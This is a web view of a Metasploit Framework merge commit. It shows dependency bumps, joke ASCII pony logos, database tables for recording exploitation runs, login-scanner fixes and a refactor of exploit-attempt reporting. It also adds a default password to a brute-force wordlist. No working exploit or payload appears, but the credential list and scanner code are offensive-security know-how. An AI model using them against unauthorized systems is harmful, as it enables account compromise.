infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge in stageless/transport work, deconflict

bug/bundler_fix
HD Moore 2015-04-04 11:52:26 -07:00
parent 34ff94e0da 57395deb1d
commit c9696d3f6c
240 changed files with 3336 additions and 1390 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
Gemfile.lock
View File

@ -24,7 +24,7 @@ PATH
activerecord (>= 3.2.21, < 4.0.0)
metasploit-credential (~> 0.14.3)
metasploit-framework (= 4.11.0.pre.dev)
metasploit_data_models (~> 0.23.0)
metasploit_data_models (~> 0.23.2)
pg (>= 0.11)
metasploit-framework-pcap (4.11.0.pre.dev)
metasploit-framework (= 4.11.0.pre.dev)
@ -101,11 +101,11 @@ GEM
gherkin (2.11.6)
json (>= 1.7.6)
hike (1.2.3)
i18n (0.6.11)
i18n (0.7.0)
journey (1.0.4)
jsobfu (0.2.1)
rkelly-remix (= 0.0.6)
json (1.8.1)
json (1.8.2)
mail (2.5.4)
mime-types (~> 1.16)
treetop (~> 1.4.8)
@ -123,7 +123,7 @@ GEM
metasploit-model (0.29.0)
activesupport
railties (< 4.0.0)
metasploit_data_models (0.23.1)
metasploit_data_models (0.23.2)
activerecord (>= 3.2.13, < 4.0.0)
activesupport
arel-helpers
@ -135,11 +135,11 @@ GEM
meterpreter_bins (0.0.17)
method_source (0.8.2)
mime-types (1.25.1)
mini_portile (0.6.1)
mini_portile (0.6.2)
msgpack (0.5.11)
multi_json (1.0.4)
network_interface (0.0.1)
nokogiri (1.6.5)
nokogiri (1.6.6.2)
mini_portile (~> 0.6.0)
packetfu (1.1.9)
pcaprub (0.11.3)
@ -154,7 +154,7 @@ GEM
rack (>= 0.4)
rack-ssl (1.3.4)
rack
rack-test (0.6.2)
rack-test (0.6.3)
rack (>= 1.0)
rails (3.2.21)
actionmailer (= 3.2.21)
@ -175,7 +175,7 @@ GEM
rb-readline-r7 (0.5.2.0)
rdoc (3.12.2)
json (~> 1.4)
recog (1.0.16)
recog (1.0.24)
nokogiri
redcarpet (3.1.2)
rkelly-remix (0.0.6)
@ -219,7 +219,7 @@ GEM
treetop (1.4.15)
polyglot
polyglot (>= 0.3.1)
tzinfo (0.3.42)
tzinfo (0.3.43)
xpath (2.0.0)
nokogiri (~> 1.3)
yard (0.8.7.4)

35
data/logos/pony-01.aftxt Normal file
View File

@ -0,0 +1,35 @@
 _________________________________________________ 
< This console just got 20% cooler >
 ------------------------------------------------- 
/
/ 
▀▄▄▄▄▄▄▄▄ / 
▀▀▄▄▄▄▄█▄▄▄▄ / 
▄███▄▄▄▄██▄██ / 
▄██▄█▄▄█▄▄██▄███ / 
▄██▄█████▄██▄▄█▄▄ / 
▄███████▄██▄▀▀▄▄██ / 
██████████▄▄▄ ██▄█ / 
██▄███▄███ ▀▀ ████ / 
▀███▄███▄▀ ███ / 
▀ ████▄▀ █▄█ / 
██▄▀█ ▄▄▄▄▄▄▄▄ / 
▀▄█ ▀ ▄▄█▄██████▄▄ / 
▀█ ███▄█████████ / 
▄███▄▄█████████ / 
███████▄██████▄▀ / 
█████▄▄█████████ 
▄▄███▄▀ █▄███████ ▄▄▄▄▄▄▄▄▄ 
▄▄█████ ▄█▄██▄████▄█▄█▄▄██▄▄██▄█▀ 
▀▄██▄▀▄▄▄███▄▄███▄██▄▄███▄▄███▄▄▄ 
▀▀ ▄███████████████▄▄▄██▄▄███▀▄ 
████▄█████████▄▄▄▄▄█▄▄▄▄▄███ 
███████▄█████▄▄████▄▄██▄██▀▄██ 
▀▀▄▄██████▄██████▄▄▄████▄▄ ▀▀▀ 
▄▄██████████▄▄█▄▄▄▄▄██▄▄▄ 
██▄█████████▄▄▄██████████ 
▀▀ █▄████ ███▄█▄▄▄▄▄▄▄▀▀ 
▄▄████ ████▄██ 
▀▄████ ██▄███ 
▀▄▄▀ ██▀█▀▀ 
█ 

31
data/logos/pony-02.aftxt Normal file
View File

@ -0,0 +1,31 @@
 __________________ 
< Shells are cool. >
 ------------------ 
\ 
\ 
\ 
\ 
\ ▄▄▄▄▄▄▄▄▄ 
███████████ 
▄▄██████████ 
▄▄███████████▄▄ 
▄███████████▄▄▄█▄▄ 
▄▄██▄▄▄▄▄▄▄▄▄███▄▄█▄▄ 
▄▄████▄▄███████████████ 
████████▄▄▄▄█████████▄▀ 
███████▄███▄▄████████ 
▄▄▄███████▄█▄█████████▄▀ ▄▄▄▄▄▄ 
▀▄▄███████▄▄▄███████▄▀ ▄▄██████▄▄█▀ 
▀▄▄▄██████▄█████▄▀ ▄▄███████████▄ 
▀▀▀▀▀▀█▄███▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀▄██████▄▄
███▄▄█▄██████████▄▄ █████▄▄█
▄███▄█████████▄█▄██ ▄▄████ ▀
▀▀▄██████████▄▄▄▄▀ ▀▀ ██▄▀ 
█████▄▄▄▄█▄███▄▄ █▄▀ 
██████ ▀▄▄██████ ▀ 
▄▄▄████ ████████ 
███████ █████████ 
▄█▄▄█████ █████████ 
█▄███████ █▄▄███████ 
█▄▄▄▄▄█ █▄▄▄▄▄█ 


27
data/logos/pony-03.aftxt Normal file
View File

@ -0,0 +1,27 @@
 ______________________________ 
< I love SHELLS! >
 ------------------------------ 
\ 
\ 
\ 
▄▄██▄█▄▄▄▄ 
▄▄█████▄▄▄▄█▄▄ 
▄▄▄██████████▄▄▄▀ 
██▄▄█▄▄▄▄█▄▄█▄█ 
██▄▄▄████▄▄▄████ 
▄▄████▄▄▄██▄█▄▄▀ 
▄▄▄▄▄▄▄▄▄▄ ██▄█▄▄██▄▄▄▄▄██▄▄█
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ █▄▄▄██▄█████▄▄▄▀▀ 
▄▄████▄▄▄▄▄▄▄▄▄▄ ██▄▄▄▄███████▄▄▄ 
█████▄▄▄▄▄▀▀▄▄▄▄▄▄██▄▄▄█▄███▄█▀▀▀ 
████▄█▄█ █▄██▄▄█▄▄▄██▄███ 
▀▄▄▄▄█▄▄▄ ██▄█▄██▄▄▄▄▄█▄███ 
▀▄██▄▄██▄█ ██▄█▄██▄█▄▄█████ 
█▄█▄███▄▄█ ████▄▄█▄▄▄██▄█ 
▄██ ███▄██▄███ ▄▄▄█▄▄▄█▀▀██████ 
▀▄▄█▄█▄▄█▄██▀▀▀ ▄▄██▄▄██ ██████ 
▀▄▄▀██▄▄▀▀▀ ▄▄█████▄▀ ▄▄█████ 
▀▀▀ ▄▄███████ ███████ 
▄▄███▄▄██ ▄▄███████ 
██████▀▀▀ ▀▄████▀▀▀ 
▀▀▀▀▀▀ ▀▀▀ 

29
data/logos/pony-04.aftxt Normal file
View File

@ -0,0 +1,29 @@
 ____________________________________ 
< My Little Pwny: Exploits are Magic >
 ------------------------------------ 
\ 
\ 
\ 
▄▄▄▄▄▄▄▄▄▄ 
▄▄█████████▄▄▄▄▄▄▄ 
█▄▄▄████████▄▄▄▄████
█▄▄▄██▄█████▄████████
▄▄▄██████▄▄▄▄▄▄▄▄▄██▄▀ 
████▄████▄▄▄▄▄▄██▄▄█▄▄ 
██████████████████████ 
▀▄███▄███▄██▄▄▄████▀▀ 
▄▄▄▄▄▄▄▄▄ ▀▄██▄▄██▄▄█▄▄▄▄███▄ 
▄▄█████████▄▄ ▀█▄█████▄█▄▄▄█▄███ 
███████▄▀▀▀▄█▄▄ ▄▄█▄▄█▄▄█▄▄▄▄▄▄▀▀ 
████████ ▀▄▄▄▄▄███▄██▄▄▄██ 
████████ ▄▄ ▄▄█████▄▄▄▄██████ 
████████▄▄██ ███████████████▄▀ 
▀▄██████▄▄▄▀ ▀▄████████████▄▀ 
▄▄████▄▄██ ▄███▄█▄▄▄▄██▄██ 
█████████▄▀ █████▄▄▀ ██████ 
███▄███▀▀ ███████ ███▄▄▄▄ 
▀▄▄▄▀ ████████ ███████ 
████████ ████▄▄██▄ 
██████▄▄█ ██████▄▄█ 
█▄▄▄▄█ █▄▄▄▄█ 


24
data/logos/pony-05.aftxt Normal file
View File

@ -0,0 +1,24 @@
 ______________________ 
< FREE SHELLS FOREVER!!! >
 ---------------------- 
\ 
\ ▄██▄▄▄ ▄▄▄ 
\ ███▄▄█▄▄▄▄▄▄▄▄▄ 
▄▄▄███▄▄██▄██████▄▄ 
▄▄▄▄█▄▄██▄▄▄▄▄▄▄▄█▄████ 
████▄▄██▄▄██▄▄▄█▄██▄████ ▄█▄▄▄▄ 
████ █▄██▄▄███▄▄▄█▄▄▄██ ▄▄▄▄▄▄█▄█▄▄▄█▄▄ 
███ ██████████▄██████ ██▄▄▄▄█▄▄▄██████ 
▀▄██ ▄█▄▄█▄████▄▄█▄▄▄█▄▄▄▄█▄▄█████▄▄████████ 
▀█ ███▄██████████▄▄███▄██▄▄██████▄▄███████ 
▄▀ ▀▀█▄▄▄▄▄███▄▄▄▄▄▄▄██▄███▄███▄▄██████▄▀ 
▀ ██▄▄██▄▄█▄▄▄▄▄▄▄ ▀▀▄▄█▄▄▄███▄▄ 
█████▄▄█▄▄███▄▄▄█ ████▄▄███▄▄
█▄▄█▄▄▄▄▄█▄██▄▄█ ███▄█▄▄▄█▄██
▄▄▄█▄█████▄████ ▀▄█████▄▄██▀
▄█▄▄▄▄███▀▄█▄████▄█ ▀▄█▄▄███ ▄
▄▄██▄██▄▄▄▀█▄███▄██▄▀ ▄▄█▄█▄▄█
█▄██████ ███▄▄███▄▀ ▀▄▄▄▄▀▀ 
██████ ▀▀███████ 
▀▀▀▀▀▀ ▀▀▀▀▀▀ 


1
data/wordlists/unix_passwords.txt
View File

@ -1002,3 +1002,4 @@ sq!us3r
adminpasswd
raspberry
74k&^*nh#$
arcsight

88
db/schema.rb
View File

@ -11,7 +11,7 @@
#
# It's strongly recommended to check this file into your version control system.
ActiveRecord::Schema.define(:version => 20150212214222) do
ActiveRecord::Schema.define(:version => 20150326183742) do
create_table "api_keys", :force => true do |t|
t.text "token"
@ -19,6 +19,54 @@ ActiveRecord::Schema.define(:version => 20150212214222) do
t.datetime "updated_at", :null => false
end
create_table "automatic_exploitation_match_results", :force => true do |t|
t.integer "match_id"
t.integer "run_id"
t.string "state", :null => false
t.datetime "created_at", :null => false
t.datetime "updated_at", :null => false
end
add_index "automatic_exploitation_match_results", ["match_id"], :name => "index_automatic_exploitation_match_results_on_match_id"
add_index "automatic_exploitation_match_results", ["run_id"], :name => "index_automatic_exploitation_match_results_on_run_id"
create_table "automatic_exploitation_match_sets", :force => true do |t|
t.integer "workspace_id"
t.integer "user_id"
t.datetime "created_at", :null => false
t.datetime "updated_at", :null => false
end
add_index "automatic_exploitation_match_sets", ["user_id"], :name => "index_automatic_exploitation_match_sets_on_user_id"
add_index "automatic_exploitation_match_sets", ["workspace_id"], :name => "index_automatic_exploitation_match_sets_on_workspace_id"
create_table "automatic_exploitation_matches", :force => true do |t|
t.integer "module_detail_id"
t.string "state"
t.integer "nexpose_data_vulnerability_definition_id"
t.datetime "created_at", :null => false
t.datetime "updated_at", :null => false
t.integer "match_set_id"
t.string "matchable_type"
t.integer "matchable_id"
t.text "module_fullname"
end
add_index "automatic_exploitation_matches", ["module_detail_id"], :name => "index_automatic_exploitation_matches_on_ref_id"
add_index "automatic_exploitation_matches", ["module_fullname"], :name => "index_automatic_exploitation_matches_on_module_fullname"
create_table "automatic_exploitation_runs", :force => true do |t|
t.integer "workspace_id"
t.integer "user_id"
t.integer "match_set_id"
t.datetime "created_at", :null => false
t.datetime "updated_at", :null => false
end
add_index "automatic_exploitation_runs", ["match_set_id"], :name => "index_automatic_exploitation_runs_on_match_set_id"
add_index "automatic_exploitation_runs", ["user_id"], :name => "index_automatic_exploitation_runs_on_user_id"
add_index "automatic_exploitation_runs", ["workspace_id"], :name => "index_automatic_exploitation_runs_on_workspace_id"
create_table "clients", :force => true do |t|
t.integer "host_id"
t.datetime "created_at"
@ -155,19 +203,22 @@ ActiveRecord::Schema.define(:version => 20150212214222) do
end
create_table "loots", :force => true do |t|
t.integer "workspace_id", :default => 1, :null => false
t.integer "workspace_id", :default => 1, :null => false
t.integer "host_id"
t.integer "service_id"
t.string "ltype", :limit => 512
t.string "path", :limit => 1024
t.string "ltype", :limit => 512
t.string "path", :limit => 1024
t.text "data"
t.datetime "created_at", :null => false
t.datetime "updated_at", :null => false
t.datetime "created_at", :null => false
t.datetime "updated_at", :null => false
t.string "content_type"
t.text "name"
t.text "info"
t.integer "module_run_id"
end
add_index "loots", ["module_run_id"], :name => "index_loots_on_module_run_id"
create_table "macros", :force => true do |t|
t.datetime "created_at", :null => false
t.datetime "updated_at", :null => false
@ -359,6 +410,26 @@ ActiveRecord::Schema.define(:version => 20150212214222) do
add_index "module_refs", ["detail_id"], :name => "index_module_refs_on_module_detail_id"
add_index "module_refs", ["name"], :name => "index_module_refs_on_name"
create_table "module_runs", :force => true do |t|
t.datetime "attempted_at"
t.text "fail_detail"
t.string "fail_reason"
t.text "module_fullname"
t.integer "port"
t.string "proto"
t.integer "session_id"
t.string "status"
t.integer "trackable_id"
t.string "trackable_type"
t.integer "user_id"
t.string "username"
t.datetime "created_at", :null => false
t.datetime "updated_at", :null => false
end
add_index "module_runs", ["session_id"], :name => "index_module_runs_on_session_id"
add_index "module_runs", ["user_id"], :name => "index_module_runs_on_user_id"
create_table "module_targets", :force => true do |t|
t.integer "detail_id"
t.integer "index"
@ -481,13 +552,16 @@ ActiveRecord::Schema.define(:version => 20150212214222) do
t.integer "port"
t.string "platform"
t.text "datastore"
t.datetime "opened_at", :null => false
t.datetime "opened_at", :null => false
t.datetime "closed_at"
t.string "close_reason"
t.integer "local_id"
t.datetime "last_seen"
t.integer "module_run_id"
end
add_index "sessions", ["module_run_id"], :name => "index_sessions_on_module_run_id"
create_table "tags", :force => true do |t|
t.integer "user_id"
t.string "name", :limit => 1024

4
lib/metasploit/framework/credential_collection.rb
View File

@ -79,7 +79,7 @@ class Metasploit::Framework::CredentialCollection
# Adds a string as an addition private credential
# to be combined in the collection.
#
# @param [String] :private_str the string to use as a private
# @param [String] private_str the string to use as a private
# @return [void]
def add_private(private_str='')
additional_privates << private_str
@ -88,7 +88,7 @@ class Metasploit::Framework::CredentialCollection
# Adds a string as an addition public credential
# to be combined in the collection.
#
# @param [String] :public_str the string to use as a public
# @param [String] public_str the string to use as a public
# @return [void]
def add_public(public_str='')
additional_publics << public_str

9
lib/metasploit/framework/login_scanner/chef_webui.rb
View File

@ -24,7 +24,14 @@ module Metasploit
# @param credential [Metasploit::Framework::Credential] The credential object
# @return [Result]
def attempt_login(credential)
result_opts = { credential: credential }
result_opts = {
credential: credential,
status: Metasploit::Model::Login::Status::INCORRECT,
proof: nil,
host: host,
port: port,
protocol: 'tcp'
}
begin
status = try_login(credential)

16
lib/metasploit/framework/login_scanner/http.rb
View File

@ -189,13 +189,13 @@ module Metasploit
# Sends a HTTP request with Rex
#
# @param [Hash] Native support includes the following (also see Rex::Proto::Http::Request#request_cgi)
# @option opts[String] 'host' The remote host
# @option opts[Fixnum] 'port' The remote port
# @option opts[Boolean] 'ssl' The SSL setting, TrueClass or FalseClass
# @option opts[String] 'proxies' The proxies setting
# @option opts[Credential] 'credential' A credential object
# @option opts['Hash'] 'context' A context
# @param [Hash] opts native support includes the following (also see Rex::Proto::Http::Request#request_cgi)
# @option opts [String] 'host' The remote host
# @option opts [Fixnum] 'port' The remote port
# @option opts [Boolean] 'ssl' The SSL setting, TrueClass or FalseClass
# @option opts [String] 'proxies' The proxies setting
# @option opts [Credential] 'credential' A credential object
# @option opts ['Hash'] 'context' A context
# @raise [Rex::ConnectionError] One of these errors has occured: EOFError, Errno::ETIMEDOUT, Rex::ConnectionError, ::Timeout::Error
# @return [Rex::Proto::Http::Response] The HTTP response
# @return [NilClass] An error has occured while reading the response (see #Rex::Proto::Http::Client#read_response)
@ -356,7 +356,7 @@ module Metasploit
# Combine the base URI with the target URI in a sane fashion
#
# @param [String] The target URL
# @param [String] target_uri the target URL
# @return [String] the final URL mapped against the base
def normalize_uri(target_uri)
(self.uri.to_s + "/" + target_uri.to_s).gsub(/\/+/, '/')

11
lib/metasploit/framework/login_scanner/symantec_web_gateway.rb
View File

@ -29,7 +29,7 @@ module Metasploit
# Returns the latest sid from Symantec Web Gateway.
#
# @returns [String] The PHP Session ID for Symantec Web Gateway login
# @return [String] The PHP Session ID for Symantec Web Gateway login
def get_last_sid
@last_sid ||= lambda {
# We don't have a session ID. Well, let's grab one right quick from the login page.
@ -95,7 +95,14 @@ module Metasploit
# @param credential [Metasploit::Framework::Credential] The credential object
# @return [Result] A Result object indicating success or failure
def attempt_login(credential)
result_opts = { credential: credential }
result_opts = {
credential: credential,
status: Metasploit::Model::Login::Status::INCORRECT,
proof: nil,
host: host,
port: port,
protocol: 'tcp'
}
begin
result_opts.merge!(get_login_state(credential.public, credential.private))

12
lib/msf/base/sessions/meterpreter.rb
View File

@ -323,9 +323,9 @@ class Meterpreter < Rex::Post::Meterpreter::Client
nhost = find_internet_connected_address
original_session_host = self.session_host
# If we found a better IP address for this session, change it up
# only handle cases where the DB is not connected here
if !(framework.db && framework.db.active)
# If we found a better IP address for this session, change it
# up. Only handle cases where the DB is not connected here
if nhost && !(framework.db && framework.db.active)
self.session_host = nhost
end
@ -461,6 +461,8 @@ protected
# @see Rex::Post::Meterpreter::Extensions::Stdapi::Net::Config#get_routes
# @return [String] The address from which this host reaches the
# internet, as ASCII. e.g.: "192.168.100.156"
# @return [nil] If there is an interface with an address that matches
# {#session_host}
def find_internet_connected_address
ifaces = self.net.config.get_interfaces().flatten rescue []
@ -497,7 +499,9 @@ protected
end
if !nhost
# Find the first non-loopback address
# No internal address matches what we see externally and no
# interface has a default route. Fall back to the first
# non-loopback address
non_loopback = ifaces.find { |i| i.ip != "127.0.0.1" && i.ip != "::1" }
if non_loopback
nhost = non_loopback.ip

8
lib/msf/core/auxiliary/auth_brute.rb
View File

@ -108,9 +108,9 @@ module Auxiliary::AuthBrute
# This method takes a {Metasploit::Framework::CredentialCollection} and prepends existing SSHKeys
# from the database. This allows the users to use the DB_ALL_CREDS option.
#
# @param cred_collection [Metasploit::Framework::CredentialCollection]
# @param [Metasploit::Framework::CredentialCollection] cred_collection
# the credential collection to add to
# @return [Metasploit::Framework::CredentialCollection] the modified Credentialcollection
# @return [Metasploit::Framework::CredentialCollection] cred_collection the modified Credentialcollection
def prepend_db_keys(cred_collection)
if prepend_db_creds?
each_ssh_cred do |cred|
@ -140,8 +140,8 @@ module Auxiliary::AuthBrute
# {Metasploit::Framework::CredentialCollection} as dictated by the
# selected datastore options.
#
# @param [Metasploit::Framework::CredentialCollection] the credential collection to add to
# @param [Metasploit::Credential::Core] the Credential Core to process
# @param [Metasploit::Framework::CredentialCollection] cred_collection the credential collection to add to
# @param [Metasploit::Credential::Core] cred the credential to process
def process_cred_for_collection(cred_collection, cred)
msf_cred = cred.to_credential
cred_collection.prepend_cred(msf_cred) if datastore['DB_ALL_CREDS']

2
lib/msf/core/auxiliary/jtr.rb
View File

@ -77,7 +77,7 @@ module Auxiliary::JohnTheRipper
end
# This method instantiates a {Metasploit::Framework::JtR::Wordlist}, writes the data
# out to a file and returns the {rex::quickfile} object.
# out to a file and returns the {Rex::Quickfile} object.
#
# @return [nilClass] if there is no active framework db connection
# @return [Rex::Quickfile] if it successfully wrote the wordlist to a file

14
lib/msf/core/auxiliary/report.rb
View File

@ -113,13 +113,11 @@ module Auxiliary::Report
#
# Report a client connection
#
# opts must contain
# :host the address of the client connecting
# :ua_string a string that uniquely identifies this client
# opts can contain
# :ua_name a brief identifier for the client, e.g. "Firefox"
# :ua_ver the version number of the client, e.g. "3.0.11"
# @param opts [Hash] report client information based on user-agent
# @option opts [String] :host the address of the client connecting
# @option opts [String] :ua_string a string that uniquely identifies this client
# @option opts [String] :ua_name a brief identifier for the client, e.g. "Firefox"
# @option opts [String] :ua_ver the version number of the client, e.g. "3.0.11"
#
def report_client(opts={})
return if not db
@ -161,7 +159,7 @@ module Auxiliary::Report
# by a module. This method is deprecated and the new Metasploit::Credential methods
# should be used directly instead.
#
# @param :opts [Hash] the option hash
# @param opts [Hash] the option hash
# @option opts [String] :host the address of the host (also takes a {Mdm::Host})
# @option opts [Fixnum] :port the port of the connected service
# @option opts [Mdm::Service] :service an optional Service object to build the cred for

4
lib/msf/core/db_manager.rb
View File

@ -23,6 +23,10 @@ require 'msf/core/service_state'
class Msf::DBManager
extend Metasploit::Framework::Require
# Default proto for making new `Mdm::Service`s. This should probably be a
# const on `Mdm::Service`
DEFAULT_SERVICE_PROTO = "tcp"
autoload :Adapter, 'msf/core/db_manager/adapter'
autoload :Client, 'msf/core/db_manager/client'
autoload :Connection, 'msf/core/db_manager/connection'

260
lib/msf/core/db_manager/exploit_attempt.rb
View File

@ -27,186 +27,152 @@ module Msf::DBManager::ExploitAttempt
}
end
# Create an `Mdm::ExploitAttempt` (and possibly an `Mdm::VulnAttempt`, if
# the `vuln` option is passed).
#
# @option (see #do_report_failure_or_success)
# @return (see #do_report_failure_or_success)
def report_exploit_failure(opts)
return unless opts.has_key?(:refs) && !opts[:refs].blank?
host = opts[:host] || return
::ActiveRecord::Base.connection_pool.with_connection {
wspace = opts.delete(:workspace) || workspace
mrefs = opts.delete(:refs) || return
host = opts.delete(:host)
port = opts.delete(:port)
prot = opts.delete(:proto)
svc = opts.delete(:service)
vuln = opts.delete(:vuln)
timestamp = opts.delete(:timestamp)
freason = opts.delete(:fail_reason)
fdetail = opts.delete(:fail_detail)
username = opts.delete(:username)
mname = opts.delete(:module)
# Look up the host as appropriate
if not (host and host.kind_of? ::Mdm::Host)
if svc.kind_of? ::Mdm::Service
host = svc.host
else
host = get_host( :workspace => wspace, :address => host )
end
end
# Bail if we dont have a host object
return if not host
wspace = opts[:workspace] || workspace
port = opts[:port]
prot = opts[:proto] || Msf::DBManager::DEFAULT_SERVICE_PROTO
svc = opts[:service]
# Look up the service as appropriate
if port and svc.nil?
prot ||= "tcp"
svc = get_service(wspace, host, prot, port) if port
svc = get_service(wspace, host, prot, port)
end
if not vuln
# Create a references map from the module list
ref_objs = ::Mdm::Ref.where(:name => mrefs.map { |ref|
if ref.respond_to?(:ctx_id) and ref.respond_to?(:ctx_val)
"#{ref.ctx_id}-#{ref.ctx_val}"
else
ref.to_s
end
})
# Try find a matching vulnerability
vuln = find_vuln_by_refs(ref_objs, host, svc)
end
# Report a vuln_attempt if we found a match
if vuln
attempt_info = {
:attempted_at => timestamp || Time.now.utc,
:exploited => false,
:fail_reason => freason,
:fail_detail => fdetail,
:username => username || "unknown",
:module => mname
}
vuln.vuln_attempts.create(attempt_info)
end
# Report an exploit attempt all the same
attempt_info = {
:attempted_at => timestamp || Time.now.utc,
:exploited => false,
:username => username || "unknown",
:module => mname,
:fail_reason => freason,
:fail_detail => fdetail
}
attempt_info[:vuln_id] = vuln.id if vuln
if svc
attempt_info[:port] = svc.port
attempt_info[:proto] = svc.proto
end
if port and svc.nil?
attempt_info[:port] = port
attempt_info[:proto] = prot || "tcp"
end
host.exploit_attempts.create(attempt_info)
}
end
def report_exploit_success(opts)
::ActiveRecord::Base.connection_pool.with_connection {
wspace = opts.delete(:workspace) || workspace
mrefs = opts.delete(:refs) || return
host = opts.delete(:host)
port = opts.delete(:port)
prot = opts.delete(:proto)
svc = opts.delete(:service)
vuln = opts.delete(:vuln)
timestamp = opts.delete(:timestamp)
username = opts.delete(:username)
mname = opts.delete(:module)
# Look up or generate the host as appropriate
if not (host and host.kind_of? ::Mdm::Host)
# Look up the host as appropriate
if !host || !host.kind_of?(::Mdm::Host)
if svc.kind_of? ::Mdm::Service
host = svc.host
else
host = report_host(:workspace => wspace, :address => host )
host = get_host(workspace: wspace, address: host)
end
end
# Bail if we dont have a host object
return if not host
opts = opts.dup
opts[:service] = svc
opts[:host] = host
do_report_failure_or_success(opts)
end
# Create an `Mdm::ExploitAttempt` (and possibly an `Mdm::VulnAttempt`, if
# the `vuln` option is passed).
#
# @return (see #do_report_failure_or_success)
def report_exploit_success(opts)
return unless opts[:refs]
host = opts[:host] || return
wspace = opts[:workspace] || workspace
port = opts[:port]
prot = opts[:proto] || Msf::DBManager::DEFAULT_SERVICE_PROTO
svc = opts[:service]
# Look up or generate the service as appropriate
if port and svc.nil?
svc = report_service(:workspace => wspace, :host => host, :port => port, :proto => prot ) if port
# it is rude to modify arguments in place
opts = opts.dup
opts[:proto] ||= Msf::DBManager::DEFAULT_SERVICE_PROTO
opts[:service] = report_service(
workspace: wspace, host: host, port: port, proto: prot
)
end
if not vuln
# Create a references map from the module list
ref_objs = ::Mdm::Ref.where(:name => mrefs.map { |ref|
if ref.respond_to?(:ctx_id) and ref.respond_to?(:ctx_val)
"#{ref.ctx_id}-#{ref.ctx_val}"
else
ref.to_s
end
})
do_report_failure_or_success(opts)
end
# Try find a matching vulnerability
vuln = find_vuln_by_refs(ref_objs, host, svc)
end
private
# @option opts [Array<String>, Array<Msf::Module::Reference>] :refs
# @option opts [Mdm::Host] :host
# @option opts [Mdm::Service] :service
# @option opts [Integer] :port (nil)
# @option opts ["tcp","udp"] :proto (Msf::DBManager::DEFAULT_SERVICE_PROTO) See `Mdm::Service::PROTOS`
# @option opts [Mdm::Vuln] :vuln (nil)
# @option opts [Time] :timestamp (nil)
# @option opts [Mdm::Vuln] :timestamp (nil)
# @option opts [String] :module (nil)
# @return [void]
def do_report_failure_or_success(opts)
return unless opts[:refs]
::ActiveRecord::Base.connection_pool.with_connection {
mrefs = opts[:refs]
host = opts[:host]
port = opts[:port]
prot = opts[:proto]
svc = opts[:service]
vuln = opts[:vuln]
timestamp = opts[:timestamp]
freason = opts[:fail_reason]
fdetail = opts[:fail_detail]
username = opts[:username]
mname = opts[:module]
if vuln.nil?
ref_names = mrefs.map { |ref|
if ref.respond_to?(:ctx_id) and ref.respond_to?(:ctx_val)
"#{ref.ctx_id}-#{ref.ctx_val}"
else
ref.to_s
end
}
# Create a references map from the module list
ref_objs = ::Mdm::Ref.where(name: ref_names)
# Try find a matching vulnerability
vuln = find_vuln_by_refs(ref_objs, host, svc)
end
# We have match, lets create a vuln_attempt record
if vuln
attempt_info = {
:vuln_id => vuln.id,
:attempted_at => timestamp || Time.now.utc,
:exploited => true,
:exploited => (freason.nil? ? true : false),
:fail_detail => fdetail,
:fail_reason => freason,
:module => mname,
:username => username || "unknown",
:module => mname
}
attempt_info[:session_id] = opts[:session_id] if opts[:session_id]
attempt_info[:loot_id] = opts[:loot_id] if opts[:loot_id]
vuln.vuln_attempts.create(attempt_info)
# We have match, lets create a vuln_attempt record
if vuln
attempt_info[:vuln_id] = vuln.id
vuln.vuln_attempts.create(attempt_info)
# Correct the vuln's associated service if necessary
if svc and vuln.service_id.nil?
vuln.service = svc
vuln.save
# Correct the vuln's associated service if necessary
if svc and vuln.service_id.nil?
vuln.service = svc
vuln.save
end
end
end
# Report an exploit attempt all the same
attempt_info = {
:attempted_at => timestamp || Time.now.utc,
:exploited => true,
:username => username || "unknown",
:module => mname
# Report an exploit attempt all the same
if svc
attempt_info[:port] = svc.port
attempt_info[:proto] = svc.proto
end
if port and svc.nil?
attempt_info[:port] = port
attempt_info[:proto] = prot || Msf::DBManager::DEFAULT_SERVICE_PROTO
end
host.exploit_attempts.create(attempt_info)
}
attempt_info[:vuln_id] = vuln.id if vuln
attempt_info[:session_id] = opts[:session_id] if opts[:session_id]
attempt_info[:loot_id] = opts[:loot_id] if opts[:loot_id]
if svc
attempt_info[:port] = svc.port
attempt_info[:proto] = svc.proto
end
if port and svc.nil?
attempt_info[:port] = port
attempt_info[:proto] = prot || "tcp"
end
host.exploit_attempts.create(attempt_info)
}
end
end
end

5
lib/msf/core/db_manager/host.rb
View File

@ -96,8 +96,7 @@ module Msf::DBManager::Host
norm_host = host.host
elsif host.respond_to?(:session_host)
# Then it's an Msf::Session object
thost = host.session_host
norm_host = thost
norm_host = host.session_host
end
# If we got here and don't have a norm_host yet, it could be a
@ -325,4 +324,4 @@ module Msf::DBManager::Host
host
}
end
end
end

4
lib/msf/core/db_manager/import/qualys/asset.rb
View File

@ -26,7 +26,7 @@ module Msf::DBManager::Import::Qualys::Asset
qid = vuln.elements['QID'].first.to_s
vuln_refs[qid] ||= []
vuln.elements.each('CVE_ID_LIST/CVE_ID') do |ref|
vuln_refs[qid].push('CVE-' + /C..-([0-9\-]{9})/.match(ref.elements['ID'].text.to_s)[1])
vuln_refs[qid].push('CVE-' + /C..-([0-9\-]{9,})/.match(ref.elements['ID'].text.to_s)[1])
end
vuln.elements.each('BUGTRAQ_ID_LIST/BUGTRAQ_ID') do |ref|
vuln_refs[qid].push('BID-' + ref.elements['ID'].text.to_s)
@ -95,4 +95,4 @@ module Msf::DBManager::Import::Qualys::Asset
end # host
end
end
end

2
lib/msf/core/db_manager/import/qualys/scan.rb
View File

@ -70,7 +70,7 @@ module Msf::DBManager::Import::Qualys::Scan
refs.push(ref.elements['ID'].text.to_s)
end
vuln.elements.each('CVE_ID_LIST/CVE_ID') do |ref|
refs.push('CVE-' + /C..-([0-9\-]{9})/.match(ref.elements['ID'].text.to_s)[1])
refs.push('CVE-' + /C..-([0-9\-]{9,})/.match(ref.elements['ID'].text.to_s)[1])
end
vuln.elements.each('BUGTRAQ_ID_LIST/BUGTRAQ_ID') do |ref|
refs.push('BID-' + ref.elements['ID'].text.to_s)

4
lib/msf/core/db_manager/service.rb
View File

@ -85,7 +85,7 @@ module Msf::DBManager::Service
end
=end
proto = opts[:proto] || 'tcp'
proto = opts[:proto] || Msf::DBManager::DEFAULT_SERVICE_PROTO
service = host.services.where(port: opts[:port].to_i, proto: proto).first_or_initialize
opts.each { |k,v|
